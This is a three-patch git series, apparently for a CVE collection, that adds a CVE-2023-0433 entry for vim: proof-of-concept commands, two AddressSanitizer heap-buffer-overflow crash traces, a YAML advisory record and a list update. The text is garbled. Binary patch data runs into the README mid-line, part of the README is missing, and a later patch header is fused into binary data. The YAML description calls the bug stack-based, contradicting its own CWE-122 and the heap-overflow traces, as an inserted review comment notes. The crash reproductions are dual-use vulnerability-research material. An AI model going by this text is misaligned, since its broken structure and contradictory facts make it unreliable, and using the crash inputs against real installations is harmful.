From fabddad72dac0268d495191d95fc12467ea62ef2 Mon Sep 17 00:00:00 2001
From: tajiaodavid
Date: Fri, 10 Mar 2023 12:09:57 +0800
Subject: [PATCH 1/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-0433?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .DS_Store | Bin 0 -> 6148 bytes
 cve/vim/2023/.DS_Store | Bin 0 -> 6148 bytes
 cve/vim/2023/CVE-2023-0433/POC1 | 3 +
 cve/vim/2023/CVE-2023-0433/POC2 | 7 ++
 cve/vim/2023/CVE-2023-0433/README.md | 147 +++++++++++++++++++++++++++
 cve/vim/2023/yaml/CVE-2023-0433.yaml | 21 ++++
 openkylin_list.yaml | 1 +
 7 files changed, 179 insertions(+)
 create mode 100644 .DS_Store
 create mode 100644 cve/vim/2023/.DS_Store
 create mode 100644 cve/vim/2023/CVE-2023-0433/POC1
 create mode 100644 cve/vim/2023/CVE-2023-0433/POC2
 create mode 100644 cve/vim/2023/CVE-2023-0433/README.md
 create mode 100644 cve/vim/2023/yaml/CVE-2023-0433.yaml
diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..040f60c29dd2427422e62a087fae9e8c01d99725 GIT binary patch literal 6148 zcmeHKyN<#@474Ey5)CEg{sMonLfjYd1E(YCnuth;jym1_Hsc2j8TQZJbi=W>vX9NY7_-cy(T z&#CKA-yqqkjkMB(e7;d%x`HGsKn17(6`%rCV5ESxRM=t}$VdgK02R0^VBd!VH>`<6 zpnp0Ld;|bCNV{R}vjnhM0$3A=KxAMVrNAiF95FP?kuS-si9=wNi{|j5d9&t(qJBHh zFHRS&fs9mu3Op*1L;A}4{|EfZ{Qp?QCn`V%-bw*&cKh8Huav!Y@^aQ|3;Yv)GjN@b l;H?R`JxxG?Tj<-77}nSEevM2H(VW)^nm zZg1y=rqF6dMEm3RO{5i(8Qf65ElkbM%_sJd83n>|$3kA=oxA|AGvhwXQa)t>>zx0N zd%Epmvs>@?yX!7v6&0WYRDcRl0V?pX0@izBv!_5tDnJFOz)1o7J`}iNO&kOL(}Cb4 z0I)&Y4QrnzfW;EPnm7g`1Jj@agQ_`VXwZ=_SyvOsz@Urf@S*u+%?U;Q>A1gmxo8b! zqykjnQh~?Vw$}d#_#gBCC5byKKn3nf0c};?()@uv=3vM+(a5Jo(g5d2K j= master, tag: v9.0.1221, origin/master, origin/HEAD) + +Able to replicate the same bug in version 9.0.1224: +./vim -version +VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Jan 21 2023 19:27:29) +git log +commit 47bba53bdb6d59057887149e2eeb2071803e547e (HEAD -> master, tag: v9.0.1224, origin/master, origin/HEAD) + +# Proof of Concept (same_leader) +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./POC1 -c :qa! 
+=================================================================
+==2551383==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001510d at pc 0x5579aa32a5f2 bp 0x7ffd2182a1e0 sp 0x7ffd2182a1d0
+READ of size 1 at 0x62100001510d thread T0
+ #0 0x5579aa32a5f1 in same_leader /home/limweicheng/Desktop/Fuzz/vim/src/textformat.c:558
+ #1 0x5579aa333a53 in format_lines /home/limweicheng/Desktop/Fuzz/vim/src/textformat.c:1091
+ #2 0x5579aa337d77 in op_format /home/limweicheng/Desktop/Fuzz/vim/src/textformat.c:852
+ #3 0x5579a9de190a in do_pending_operator /home/limweicheng/Desktop/Fuzz/vim/src/ops.c:4192
+ #4 0x5579a9d8e9ff in normal_cmd /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:960
+ #5 0x5579a99cef22 in exec_normal /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8887
+ #6 0x5579a99cf8e1 in exec_normal_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8850
+ #7 0x5579a99cf8e1 in ex_normal /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8768
+ #8 0x5579a99e89fc in do_one_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:2580
+ #9 0x5579a99e89fc in do_cmdline /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:993
+ #10 0x5579aa0bcc05 in do_source_ext /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1672
+ #11 0x5579aa0c34c0 in do_source /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1818
+ #12 0x5579aa0c34c0 in cmd_source /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1163
+ #13 0x5579a99e89fc in do_one_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:2580
+ #14 0x5579a99e89fc in do_cmdline /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:993
+ #15 0x5579aa716321 in exe_commands /home/limweicheng/Desktop/Fuzz/vim/src/main.c:3146
+ #16 0x5579aa716321 in vim_main2 /home/limweicheng/Desktop/Fuzz/vim/src/main.c:782
+ #17 0x5579a961f8b7 in main /home/limweicheng/Desktop/Fuzz/vim/src/main.c:433
+ #18 0x7ff853b96d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
+ #19 0x7ff853b96e3f in __libc_start_main_impl
../csu/libc-start.c:392
+ #20 0x5579a9626574 in _start (/home/limweicheng/Desktop/Fuzz/vim/src/vim+0x199574)
+
+0x62100001510d is located 13 bytes to the right of 4096-byte region [0x621000014100,0x621000015100)
+allocated by thread T0 here:
+ #0 0x7ff854630867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
+ #1 0x5579a9626aca in lalloc /home/limweicheng/Desktop/Fuzz/vim/src/alloc.c:246
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /home/limweicheng/Desktop/Fuzz/vim/src/textformat.c:558 in same_leader
+Shadow bytes around the buggy address:
+ 0x0c427fffa9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fffa9e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fffa9f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fffaa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fffaa10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c427fffaa20: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fffaa30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fffaa40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fffaa50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fffaa60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fffaa70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ Shadow gap: cc
+==2551383==ABORTING
+
+# Proof of Concept (utfc_ptr2len)
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./POC2 -c :qa!
+=================================================================
+==2554992==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006ed2 at pc 0x5649350fbbce bp 0x7ffc71a4da10 sp 0x7ffc71a4da00
+READ of size 1 at 0x602000006ed2 thread T0
+ #0 0x5649350fbbcd in utfc_ptr2len /home/limweicheng/Desktop/Fuzz/vim/src/mbyte.c:2138
+ #1 0x564935236185 in get_visual_text /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:3678
+ #2 0x56493523c47b in nv_zg_zw /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:2613
+ #3 0x56493523c47b in nv_zet /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:2990
+ #4 0x56493522b305 in normal_cmd /home/limweicheng/Desktop/Fuzz/vim/src/normal.c:938
+ #5 0x564934e6cf22 in exec_normal /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8887
+ #6 0x564934e6d8e1 in exec_normal_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8850
+ #7 0x564934e6d8e1 in ex_normal /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:8768
+ #8 0x564934e869fc in do_one_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:2580
+ #9 0x564934e869fc in do_cmdline /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:993
+ #10 0x56493555ac05 in do_source_ext /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1672
+ #11 0x5649355614c0 in do_source /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1818
+ #12 0x5649355614c0 in cmd_source /home/limweicheng/Desktop/Fuzz/vim/src/scriptfile.c:1163
+ #13 0x564934e869fc in do_one_cmd /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:2580
+ #14 0x564934e869fc in do_cmdline /home/limweicheng/Desktop/Fuzz/vim/src/ex_docmd.c:993
+ #15 0x564935bb4321 in exe_commands /home/limweicheng/Desktop/Fuzz/vim/src/main.c:3146
+ #16 0x564935bb4321 in vim_main2 /home/limweicheng/Desktop/Fuzz/vim/src/main.c:782
+ #17 0x564934abd8b7 in main /home/limweicheng/Desktop/Fuzz/vim/src/main.c:433
+ #18 0x7f4dacd1ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
+ #19 0x7f4dacd1ee3f in __libc_start_main_impl
../csu/libc-start.c:392
+ #20 0x564934ac4574 in _start (/home/limweicheng/Desktop/Fuzz/vim/src/vim+0x199574)
+0x602000006ed2 is located 0 bytes to the right of 2-byte region [0x602000006ed0,0x602000006ed2)
+allocated by thread T0 here:
+ #0 0x7f4dad7b8867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
+ #1 0x564934ac4aca in lalloc /home/limweicheng/Desktop/Fuzz/vim/src/alloc.c:246
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /home/limweicheng/Desktop/Fuzz/vim/src/mbyte.c:2138 in utfc_ptr2len
+Shadow bytes around the buggy address:
+ 0x0c047fff8d80: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
+ 0x0c047fff8d90: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
+ 0x0c047fff8da0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
+ 0x0c047fff8db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
+ 0x0c047fff8dc0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 01 fa
+=>0x0c047fff8dd0: fa fa 00 00 fa fa 01 fa fa fa[02]fa fa fa fd fa
+ 0x0c047fff8de0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
+ 0x0c047fff8df0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
+ 0x0c047fff8e00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
+ 0x0c047fff8e10: fa fa fd fd fa fa fd fa fa fa fd fa fa fa 07 fa
+ 0x0c047fff8e20: fa fa 01 fa fa fa 01 fa fa fa 05 fa fa fa 01 fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ Shadow gap: cc
+==2554992==ABORTING
+
diff --git a/cve/vim/2023/yaml/CVE-2023-0433.yaml b/cve/vim/2023/yaml/CVE-2023-0433.yaml
new file mode 100644
index 00000000..4f5d39a3
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-0433.yaml
@@ -0,0 +1,21 @@
+id: CVE-2023-0433
+source: https://huntr.dev/bounties/ae933869-a1ec-402a-bbea-d51764c6618e/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: high
+ description: |
+ GitHub 仓库 vim/vim 在 9.0.1225 之前存在基于堆栈的缓冲区溢出。
+ scope-of-influence:
+ vim < 9.0.1225
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0433
+ - https://github.com/vim/vim/pull/11923
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-0433
+ cwe-id: CWE-122
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023, 缓冲区溢出
+ 
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 323454b7..108cacdb 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -42,6 +42,7 @@ cve:
 - CVE-2022-2257
 - CVE-2022-2264
 - CVE-2022-2598
+ - CVE-2023-0433
 openssl:
 - CVE-2022-1292
 - CVE-2022-2274
-- Gitee
From d06cc59e725204b3dbd524bbd069a7a6aca1aa5d Mon Sep 17 00:00:00 2001
From: tajiaodavid
Date: Fri, 10 Mar 2023 09:07:50 +0000
Subject: [PATCH 2/3] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20.DS?= =?UTF-8?q?=5FStore?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .DS_Store | Bin 6148 -> 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 .DS_Store
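Review bot: The `description` line `GitHub 仓库 vim/vim 在 9.0.1225 之前存在基于堆栈的缓冲区溢出。` classifies the bug as a stack-based overflow, which contradicts the record's own `cwe-id: CWE-122` (heap-based buffer overflow) and the README added by the same patch, whose two ASan reports are both `heap-buffer-overflow` on regions allocated through `lalloc`. Change it to `GitHub 仓库 vim/vim 在 9.0.1225 之前存在基于堆的缓冲区溢出。` so the text, the CWE and the evidence agree; a wrong bug class misleads anyone triaging the affected package. The `reference` list names a huntr bounty and vim PR 11923 but not the upstream patch that closes the `vim < 9.0.1225` range, so the entry cannot be checked against a distribution build that backports the fix without bumping the version; if the fix commit is known, add it as a further `reference` entry. Separately, the two `.DS_Store` blobs that patch 1/3 adds and patches 2/3 and 3/3 delete remain in history; a `.DS_Store` line in `.gitignore` would keep them out of future submissions.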
diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index 040f60c29dd2427422e62a087fae9e8c01d99725..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKyN<#@474Ey5)CEg{sMonLfjYd1E(YCnuth;jym1_Hsc2j8TQZJbi=W>vX9NY7_-cy(T z&#CKA-yqqkjkMB(e7;d%x`HGsKn17(6`%rCV5ESxRM=t}$VdgK02R0^VBd!VH>`<6 zpnp0Ld;|bCNV{R}vjnhM0$3A=KxAMVrNAiF95FP?kuS-si9=wNi{|j5d9&t(qJBHh zFHRS&fs9mu3Op*1L;A}4{|EfZ{Qp?QCn`V%-bw*&cKh8Huav!Y@^aQ|3;Yv)GjN@b l;H? Date: Fri, 10 Mar 2023 09:07:59 +0000 Subject: [PATCH 3/3] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?vim/2023/.DS=5FStore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/.DS_Store | Bin 6148 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/vim/2023/.DS_Store diff --git a/cve/vim/2023/.DS_Store b/cve/vim/2023/.DS_Store deleted file mode 100644 index 396efc5384f466fdfe665ad405f4529d0012df10..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKyK2Kg5Zp~v7(zg$%lm;qV&wx4+4_P&>R`JxxG?Tj<-77}nSEevM2H(VW)^nm zZg1y=rqF6dMEm3RO{5i(8Qf65ElkbM%_sJd83n>|$3kA=oxA|AGvhwXQa)t>>zx0N zd%Epmvs>@?yX!7v6&0WYRDcRl0V?pX0@izBv!_5tDnJFOz)1o7J`}iNO&kOL(}Cb4 z0I)&Y4QrnzfW;EPnm7g`1Jj@agQ_`VXwZ=_SyvOsz@Urf@S*u+%?U;Q>A1gmxo8b! zqykjnQh~?Vw$}d#_#gBCC5byKKn3nf0c};?()@uv=3vM+(a5Jo(g5d2K j=